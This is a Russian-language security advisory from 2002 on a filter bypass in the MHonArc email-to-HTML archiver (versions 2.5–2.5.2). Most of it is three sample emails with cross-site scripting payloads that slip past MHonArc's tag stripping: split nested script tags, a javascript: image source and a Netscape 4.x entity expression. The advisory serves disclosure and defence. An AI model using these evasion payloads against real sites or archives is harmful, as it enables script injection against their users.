Обход фильтрации в MHonArc

Дата публикации:
22.04.2002
Всего просмотров:
720
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: MHonArc - Perl программа, предназначенная для автоматического преабразования электронных сообщений в архив в HTML формате. MHonArc включает поддержку фильтрации, предназначенную для удаления опасных тэгов и JavaScript кода в электронной почте.

Уязвимость позволяет обходить фильтрацию контента.

Уязвимость найдена в MHonArc 2.5-2.5.2

1. Exploit 1:

  From: test@example.com
  To: test@example.com
  Date: Sun, 16 Dec 2001 00:00:00 +0900
  Subject: test
  MIME-Version: 1.0
  Content-Type: text/html
  
  <HTML>
  <SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT>
  </HTML>
Exploit 2:
  From: test@example.com
  To: test@example.com
  Date: Sun, 16 Dec 2001 00:00:00 +0900
  Subject: test
  MIME-Version: 1.0
  Content-Type: text/html
  
  <HTML>
  <IMG SRC=javascript:alert(document.domain)>
  </HTML>
Exploit 3:
  From: test@example.com
  To: test@example.com
  Date: Sun, 16 Dec 2001 00:00:00 +0900
  Subject: test
  MIME-Version: 1.0
  Content-Type: text/html
  
  <HTML>
  <B foo=&{alert(document.domain)};>
  Vulnerable only if Netscape 4.x is used to browse.</B>
  </HTML>


Ссылки: Источник
или введите имя

CAPTCHA